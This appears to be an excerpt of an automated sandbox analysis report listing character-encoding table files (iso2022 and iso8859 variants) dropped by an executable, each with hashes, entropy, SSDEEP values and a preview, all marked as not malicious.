                                                                                                                                                                                                                              MD5:BB186D4BE3FA67DD3E2DEE82DD8BD628
                                                                                                                                                                                                                              SHA1:93CE8627038780CFFF8C06E746DD5FB2B041115C
                                                                                                                                                                                                                              SHA-256:741B4C842557EED2952936204D0AE9C35FA3A0F02F826D94C50C46976291797C
                                                                                                                                                                                                                              SHA-512:4921E7AA3DB8E33609603FE129B97275DFF80CFB06648D2068FA7950246C67B9B530B74827638F69F4DFB8F55CDD4AA952EA72EAEB6ABB527D52F20C6B46FB51
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso2022, escape-driven..E..name..iso2022..init..{}..final..{}..iso8859-1.\x1b(B..jis0201..\x1b(J..gb1988..\x1b(T..jis0208..\x1b$B..jis0208..\x1b$@..jis0212..\x1b$(D..gb2312..\x1b$A..ksc5601..\x1b$(C..jis0208..\x1b&@\x1b$B..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.236046263464657
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:iyHVBUlJvRj7SOVbusZhAMiZyi77qimmvGNNlkL+rSMH+tKv:iyMlBVnrAMiwMmTmokLz0
                                                                                                                                                                                                                              MD5:3538A970CD098BF5CE59005FE87B6626
                                                                                                                                                                                                                              SHA1:285A96CC40D7CCE104FB4B407C7F0C400AA8F9CB
                                                                                                                                                                                                                              SHA-256:A9CB4F4CA111608F882729BC5EB1C2F15530C515EF02DD2CA62F2D8DC5A210CF
                                                                                                                                                                                                                              SHA-512:A6A6F2D8B5C22E240D195D168A604887062508FF3340D24E13BFCBD6C2E687347F2CFE724FA2ED12F36915B55EE2CFD901EC3F08E2B0A2FFD3BC2A98BBD12A50
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-1, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E300
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.319750415373386
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:jHVBUlJvRj7SOVbusZhAMiZyi77qimXG2yM6q7KytC:jMlBVnrAMiwMmTXG2gytC
                                                                                                                                                                                                                              MD5:CBDE40170FECD2496A9DA3CF770FAB7B
                                                                                                                                                                                                                              SHA1:3E1D74DF6AFEB6CDE8ECBDAC8F81F2F9C64150DE
                                                                                                                                                                                                                              SHA-256:48F4A239C25354F0E9F83A39F15D4632BB18A9C33E60C671C67307159917ECED
                                                                                                                                                                                                                              SHA-512:A26B56A4CFE29E5A0A0B3A55283A7767397693388E2DEEC342C69B6F718FAE2407EB8D5ADE538FAE6947CBB8B052943C3A52F2D046ABAC7A3DAA86D730DC293F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-10, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0010401120122012A0128013600A7013B011001600166017D00AD016A014A..00B0010501130123012B0129013700B7013C011101610167017E2015016B014B..010000C100C200C300C400C500C6012E010C00C9011800CB011600CD00CE00CF..00D00145014C00D300D400D500D6016800D8017200DA00DB00DC00DD00DE00DF..010100E100E200E30
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3206399689840476
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:6HVBUlJvRj7SOVbusZhAMiZyi77qimwHmEU4AyqU+TWwdd:6MlBVnrAMiwMmTf4AyqUSd
                                                                                                                                                                                                                              MD5:E2A0BCB83BFC3F435CDCFC20D5CF2E0C
                                                                                                                                                                                                                              SHA1:CFD18B5B5DB4EE46E63D912B8FD66D513C4C8D39
                                                                                                                                                                                                                              SHA-256:21E769C5A66E4D12D6E7DB24022E92AF1EC0D0331FE3C8C605654F239C0F3640
                                                                                                                                                                                                                              SHA-512:C86F9180F2F4A177F1EA10E26B0903ABEAFDDE0317C332A48F8D1BB586DAC91C68800E2E4FA2CD739C435419B106CBA4BEFC049F2BCD720E9FC2C0AE8436CFAC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-11, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.338879965076632
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:olHVBUlJvRj7SOVbusZhAMiZyi77qim2w4kBUioGnd2:olMlBVnrAMiwMmT/WNI2
                                                                                                                                                                                                                              MD5:21CEBB723D47B1450A7FB21A82470B97
                                                                                                                                                                                                                              SHA1:A40FD3AFE1ECE89E3F682D527D281BC563DB3892
                                                                                                                                                                                                                              SHA-256:3271D39D7B4DCD841E8E5D5153D1B8837718B88FEFEC73DC37D314816EEFE5E5
                                                                                                                                                                                                                              SHA-512:3A0E033A4D93C679215F672C6C4FE425D63E1DE157AA671E7400639165EC3EB498E4EEB030D6FB8FF8BE2FD8C986D341036A8CED9FA094D092CF2822D5DC065B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-13, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0201D00A200A300A4201E00A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B3201C00B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F010101070
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3670559016263915
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:vHVBUlJvRj7SOVbusZhAMiZyi77qimhw6COlk1fKMH+tiH:vMlBVnrAMiwMmT/tlkQz0
                                                                                                                                                                                                                              MD5:FDAA88946DE4EB4E6D37F2B6AFCF6CAF
                                                                                                                                                                                                                              SHA1:56FC4773941E7457EA04EDA92C883642DE45D100
                                                                                                                                                                                                                              SHA-256:F0A5675027FB1CA34B4E4128D24C2968CD275890569A32A86AFA4994CE4983E0
                                                                                                                                                                                                                              SHA-512:92658A6FEB42A41B3CFFC377C4A9A3F6780A79FC596D3FEDBA6D3B3D75A9F40E859A2CE8DC579A278BAEEDEEFA2408E2B7853D99D5C2D14AACF63C521FE2BB86
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-14, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A01E021E0300A3010A010B1E0A00A71E8000A91E821E0B1EF200AD00AE0178..1E1E1E1F012001211E401E4100B61E561E811E571E831E601EF31E841E851E61..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..017400D100D200D300D400D500D61E6A00D800D900DA00DB00DC00DD017600DF..00E000E100E200E30
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.260398494526282
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:mHVBUlJvRj7SOVbusZhAMiZyi77qimmRf4kL+rSMH+tKv:mMlBVnrAMiwMmTmCkLz0
                                                                                                                                                                                                                              MD5:D779D5E2A0083C616A226B2D82ABF0EB
                                                                                                                                                                                                                              SHA1:D1657DB5E2989EBA80BAB98A1E1217CFFFBB19DB
                                                                                                                                                                                                                              SHA-256:C74E8E23A0FF0D5DEA7C318CA20DC817DA4E57B0DD61B3361FC0D5098A9316FE
                                                                                                                                                                                                                              SHA-512:26E62BE8AE793ED3B725BF0D1BABF4D6ED63A6F3772ABD48955FC4394BDE5A47614D1FF89A21A828676BF1302F3C9361B557B0FBF0DF8561FB7E66542FE94CDC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-15, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A320AC00A5016000A7016100A900AA00AB00AC00AD00AE00AF..00B000B100B200B3017D00B500B600B7017E00B900BA00BB01520153017800BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E30
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3065938185320918
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:dHVBUlJvRj7SOVbusZhAMiZyi77qim0SmmPkYTtyL:dMlBVnrAMiwMmTttPkYpyL
                                                                                                                                                                                                                              MD5:74FDEDDAF670023DA7751FB321E345A0
                                                                                                                                                                                                                              SHA1:0677FED67C1333A9A74D50642E5214701A57E2AF
                                                                                                                                                                                                                              SHA-256:640D977EC1D22B555C5075798DA009E3523E8F55F29BE22A3050CD1B4EF7B80E
                                                                                                                                                                                                                              SHA-512:AC02FD95159A856A9DDEF4E6A8216B958DC07311B553FF39403DC5B77E1AFF2A2C4C03F5F26A2BB7AD5DB6800BEE03E895554556DBBFBE89426286796ADE55AC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-16, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040105014120AC201E016000A7016100A9021800AB017900AD017A017B..00B000B1010C0142017D201D00B600B7017E010D021900BB015201530178017C..00C000C100C2010200C4010600C600C700C800C900CA00CB00CC00CD00CE00CF..0110014300D200D300D4015000D6015A017000D900DA00DB00DC0118021A00DF..00E000E100E201030
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.340505173539446
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:UHVBUlJvRj7SOVbusZhAMiZyi77qim/ssm5VO6ys2K:UMlBVnrAMiwMmT/ssYTys2K
                                                                                                                                                                                                                              MD5:9B87850646FFE79F3C8001CBCB5BB3A1
                                                                                                                                                                                                                              SHA1:8F97576F3FB3B5DBEF71DC2C9314AB5E530974D6
                                                                                                                                                                                                                              SHA-256:76949B03F57041B07F41902BD7505AB3594D79AA8F7BDEED5F0481004B10CBC3
                                                                                                                                                                                                                              SHA-512:101A28AF0799E7E0A5723E5DD76D5EF0FEEF584AC479A88F499CB3B7D2AA93767D72F8E51C76F7547F08FF8DD3CBBA7FF444BD07F99A92755526E75C596109EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-2, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0010402D8014100A4013D015A00A700A80160015E0164017900AD017D017B..00B0010502DB014200B4013E015B02C700B80161015F0165017A02DD017E017C..015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E..01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF..015500E100E2010300
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.2507537230559977
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:tHVBUlJvRj7SOVbusZhAMiZyi77qimw2g0kgTJMkFtoD:tMlBVnrAMiwMmTo0kgTJDoD
                                                                                                                                                                                                                              MD5:CBD0B9CDCD9BC3D5F2429A760CF98D2F
                                                                                                                                                                                                                              SHA1:6DEF0343E0357E0671002A5D2F0BFC2E00C8BCF9
                                                                                                                                                                                                                              SHA-256:1F51E7BDA64D466C16FEE9A120BBE3353A10CEB9DAB119FFA326779BA78D8C5D
                                                                                                                                                                                                                              SHA-512:88DB6D23B53F4A78133C794ED42FA3F29A4ABAD35DE4B022040FA187AA59B00664CC13F47AFF4507D72F4CB2166F026144213EE760AB0FD67CDD2FA5906F434A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-3, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0012602D800A300A40000012400A700A80130015E011E013400AD0000017B..00B0012700B200B300B400B5012500B700B80131015F011F013500BD0000017C..00C000C100C2000000C4010A010800C700C800C900CA00CB00CC00CD00CE00CF..000000D100D200D300D4012000D600D7011C00D900DA00DB00DC016C015C00DF..00E000E100E2000000
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.3413832766873073
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KHVBUlJvRj7SOVbusZhAMiZyi77qimX4AsD/njR7Ky8hA:KMlBVnrAMiwMmTXBs3EyuA
                                                                                                                                                                                                                              MD5:8B620EDECAC2DF15A024C2CE15FB64A5
                                                                                                                                                                                                                              SHA1:65C5EE5D08964E37393E6A78ABA0DB16D51240E2
                                                                                                                                                                                                                              SHA-256:66B3CF994F0B5E0103D13E812958320AFB555C91E3F81B579D4CBF231E6A0805
                                                                                                                                                                                                                              SHA-512:93391325405D3AEA0A913F5EA8EA0391920D10F234C26AB1DA70992702889A3AF7B85E11A1FCA554690942B238CE313DD460798E59C5B1F4069036E7B0F24F44
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-4, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A001040138015600A40128013B00A700A8016001120122016600AD017D00AF..00B0010502DB015700B40129013C02C700B80161011301230167014A017E014B..010000C100C200C300C400C500C6012E010C00C9011800CB011600CD00CE012A..01100145014C013600D400D500D600D700D8017200DA00DB00DC0168016A00DF..010100E100E200E300
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.342721205983665
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:zHVBUlJvRj7SOVbusZhAMiZyi77qimq5+SAJlz9aRme3cJbx:zMlBVnrAMiwMmTqeYnsJbx
                                                                                                                                                                                                                              MD5:6FBEFDC3DEC612B7B2CC903D8C53F45B
                                                                                                                                                                                                                              SHA1:14EC3C166DC411149C32C262DBE8E327F6186669
                                                                                                                                                                                                                              SHA-256:3130BF26DA0C840C1E02203A90C3B1C38966FB203130E2FBB3DD7CB3865A3539
                                                                                                                                                                                                                              SHA-512:F3F15AD8B6C9D9B4C9C994FE3235B4463E59BE7DCE79CF3F7AA77905D6F4DC2C4AABB79B440767DB13D357B13F09EA34983FCA7BC92D0AFA15FB6CBEDDD04E38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-5, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0040104020403040404050406040704080409040A040B040C00AD040E040F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..0430043104320433043404350436043704380439043A043B043C043D043E043F..044004410442044304
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):2.992219341429816
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:YHVBUlJvRj7SOVbusZhAMiZyi77qimEZjyG/KE:YMlBVnrAMiwMmTEs6KE
                                                                                                                                                                                                                              MD5:52F025D943A45EE840D9C3DFD06E4D79
                                                                                                                                                                                                                              SHA1:571EA14B49FA6150BFD2ABA79E52799955D9FA10
                                                                                                                                                                                                                              SHA-256:CB71909BF01A3A7A4C7396359DA06D206B58A42AD68192CE37169D6640D46E13
                                                                                                                                                                                                                              SHA-512:77FF9DC785A63CA59A7D58BB25C7D2C16F364E525F9B939177385EF80F7DE37734C8774F1BC829CF0270FD66257A4D31689654C8037DB0A86A0291FFDE637B90
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-6, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000000000000000A40000000000000000000000000000060C00AD00000000..00000000000000000000000000000000000000000000061B000000000000061F..0000062106220623062406250626062706280629062A062B062C062D062E062F..0630063106320633063406350636063706380639063A00000000000000000000..064006410642064306
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.393893260854861
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TMyHVBUlJvRj7SOVbusZhAMiZyi77qim2OBHK9QQSqiWeIDDdn:TlMlBVnrAMiwMmT1hKyQSqiWeIVn
                                                                                                                                                                                                                              MD5:4BFB0A35D971A9D4C5EA8D8099E93C37
                                                                                                                                                                                                                              SHA1:8FED2CBB1343E5B4442748242B5F89A76110592D
                                                                                                                                                                                                                              SHA-256:76F6BC85FC9CB89BC3F94D36275AB23C740BA17FD36EC8907479DA3A885415EA
                                                                                                                                                                                                                              SHA-512:C9CE1E9EA57A1DEF62BBC60A115C06325C6EE8F92021695459E1ADAF1193A559BC5F0229191BFC2E344296DC137583ED4A9A61A65890F99F4CF97B3864C7AF0F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# Encoding file: iso8859-7, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A02018201900A320AC20AF00A600A700A800A9037A00AB00AC00AD00002015..00B000B100B200B303840385038600B703880389038A00BB038C00BD038E038F..0390039103920393039403950396039703980399039A039B039C039D039E039F..03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF..03B003B103B203B303
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1114
                                                                                                                                                                                                                              Entropy (8bit):3.0494739426493567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:uHVBUlJvRj7SOVbusZhAMiZyi77qimieGlnvs26Kcv:uMlBVnrAMiwMmTirv87
                                                                                                                                                                                                                              MD5:5F69EAF54E7A1E8AC81C9E734DBE90D8
                                                                                                                                                                                                                              SHA1:BA509C88A4FC03922EF5CDC887FAA7B594A9BC5A
                                                                                                                                                                                                                              SHA-256:865E3665743B5FABA3E1AD6AA55515A666BD05DA6266879D9B66C98905DAFF3C
                                                                                                                                                                                                                              SHA-512:D9924FBE59CB571AF721CA602DBE58CAD0D9310610EDF544F8FC0FBF3D1CE4E99597D0198E4E7C802107012786346FE4C1B9C6C3A76D5F60B9A83981B0EDA24D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
